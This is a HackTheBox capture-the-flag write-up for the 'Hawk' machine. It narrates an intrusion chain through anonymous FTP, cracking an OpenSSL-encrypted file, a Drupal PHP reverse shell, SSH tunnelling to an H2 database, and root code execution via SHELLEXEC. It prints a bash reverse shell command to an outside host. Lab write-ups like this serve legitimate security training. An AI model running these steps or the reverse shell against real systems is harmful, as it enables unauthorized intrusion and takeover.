HackTheBox — Hawk Wrietup
Hawk is a Medium-Hard level Oscp like linux machine on hack the box and Its very tricky.
In this box we get an openssl encrypted file after connecting to FTP which we decode to get the password for Drupal.There is also a H2 database which we do not have access to as it blocks remote connections.Once we are logged into drupal we get code execution via php reverse shell.Then we find the password for the user in a drupal settings file which we use to Local ssh tunnel the H2 database in our kali.Finally we get code execution on H2 database and get root shell.
Enumeration
Honestly in this box,all ports will be useful as you will see :) IF you scan using -sC flag(Scan with default NSE scripts) it will show “Anonymous FTP allowed” so lets connect to ftp and when it asks for username, use “anonymous”
We find a file .drupal.txt.enc which we can download in our local kali machine using mget command.Lets pause for a second and before decoding this file lets look at whats running on other ports.We will get back to this file later
Looking at the nmap scan we find port 80 and 8082 to be open.Port 80 hosts drupal website(at the bottom of the image you can see powered by drupal)
Port 8082 hosts a H2 console.However it mentions that it does not allow remote connections.(This gives us a hint that it allows local connections and later we will do some local port forwarding to access it :) anyways lets move on)
I used dirsearch to find hidden directories and found some files which were mainly configuration files of drupal.
nothing interesting.I also scanned drupal using droopscan
also tried an exploit but it was of no use
I even brute forced drupal login page.A bonus tip is that if you enter a valid username, drupal will tell you if it exists ornot, just like wordpress.We are confirmed of a use called “admin”
Honestly i was stuck on this box and later found out that there was ftp anonymous login.I had not found this initially as i did not use the correct syntax during my nmap scan which i regretted.SO always enumerate well !
The decoded file seems to contain some data which is base64 endoded
Lets decode it online
The decoded output starts with Salted__kY xxxxx and i was unable to understand what format is it encoded in so i used google
and it seems like it is an openssl encrypted file with a salted password.(https://security.stackexchange.com/questions/124312/decrypting-binary-code-from-a-base64-string)
To find the password to this file we can use a tool that comes in kali called bruteforce-salted-openssl if you dont have it, google how to install it
Now this took me a lot of time as i came to know that we also need to provide the cypher and digest.Moreover i had saved the base64 decoded text in a .txt file which did’nt seem to work. After watching ippsec’s vide i found that you have to decode the file using -d syntax of base64 utility
As you can see, i base64 decoded the original file(which we got from FTP)and saved it as drupal_decoded.txt.enc (yes we have to use the .enc extension)
Finally we use thebruteforce-salted-openssl tool.We use rockyou.txt for the wordlist and SHA256 for the digest and finally got the password as “friends”
Now once we have the password we google how to decrypt an openssl file using password and got this in stackexchange website
Lets run the command and we use aes 256 cbc which is used by default and save the output in a file called resultss.txt
and Finally after so much hassle we get the password PencilKeyboardScanner123 which we can use in drupal to login as admin.Also there is a user called Daniel
EXPLOITING DRUPAL
After this its pretty straightforward.We try to exploit a vulnerable plugin/article and make it run php code to get a reverse shell just like we would do in wordpress.You can refer-https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/drupal#code-execution-inside-drupal-with-admin-creds
Go to Modules -> (Check) PHP Filter -> Save configuration
Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview
For reverse shell i have used this one from pentestmonkey-https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
To stablize it run-> python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Now lets upload our linpeas script to our target.First we start a python simplehttp server in our kali to host the files on port 9999
and then run the wget command on our target to download the file and chmod +x to give linpeas.sh executable permission and finally run it.
Now this is a bit tricky to notice at first but we do not get any critical vulnerability in the results.However in the processes running as root we see h2 server being run via java
Via google we fin dthat the password file of drupal is stored in /sites/default/settings.php directory (this is something i hadn’t known as well)
And we finally get the password for Daniel
Lets use the password to ssh into daniel user
Do note that you will get a python shell instead of a normal bash shell.IN order to stablize it you have to run — import os and then os.system(“bash”) all commands are shown above.
Again we can check that h2 database is running by using ps -ef | grep h2
Now if you remember the port 8002 running h2 tells us that remote connections are not allowed.BUT NOW we have access to the machine.We can use local SSH tunneling to access it.
local ssh tunneling
ssh -L 9005:127.0.0.1:8002 daniel@10.10.10.102
format:
ssh -L local_port:destination_server_ip:remote_port ssh_server_hostname
In simple words this tells Daniel to forward its port 8002(running h2) to our kali’s port 9005
Once you get a shell run import os and then os.system(“bash”) to stablize the shell
Now just go to your kali browser’s 127.0.0.1:9005 and you will be able to access h2 database
NOTE: ssh tunnelling can be a bit confusing.I would suggest you to watch ippsec’s video which covers local and remote ssh tunneling in hist video.
on our kali we can run netstat -anlp | grep 9005 and see that our localhost(kali) is running ssh on port 9005
We can try using the default credentials of h2 database
however it wont work.
The intended way is that you log in using the username drupal, password drupal4hawk and in the the JDBC URL we use Drupal after the /(slash) the jdbc url is basically the database name.You can also use any random name in jdbc url like “zeus” after the slash and it creates a new database name called zeus. as you can see below
Now there are 2 ways to exploit it to get root.You can either use an exploit or do it manually by running code
If you read this article it mentions of an exploit to directly get root-https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/h2-java-sql-database
Here is the link to that exploit-https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
what it basically does is creates a database in h2 and then injects code and gets a reverse shell.Late We will also cover the mannual way for a better understanding.
Lets download and run it. We use 127.0.0.1:9005 as we are running the h2 database on port 9005 of our local kali machine
Coming to the mannual way.if you google how to exploit h2, you will find this article-https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
It gives a command which you can run to execute anything.in this case “id” command.
All we have to do is go to our daniel shell.Go to /tmp directory and create a file called exploit.sh having the bash reverse shell
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
now chmod +x to give it executable permission
and in your h2 database command use CALL SHELLEXEC(‘/tmp/exploit.sh’)
which will execute the reverse shell as root and we finally catch it using netcat.
CONCLUSION
I honestly think this box was very tricky and not too easy.However very informative as it teaches you a bunch of things like cryptography,ssh tunnelling,exploiting drupal, exploiting h2 database.If you learned from this writeup make sure to follow me here on medium for more oscp like writeups.
- ZEUS
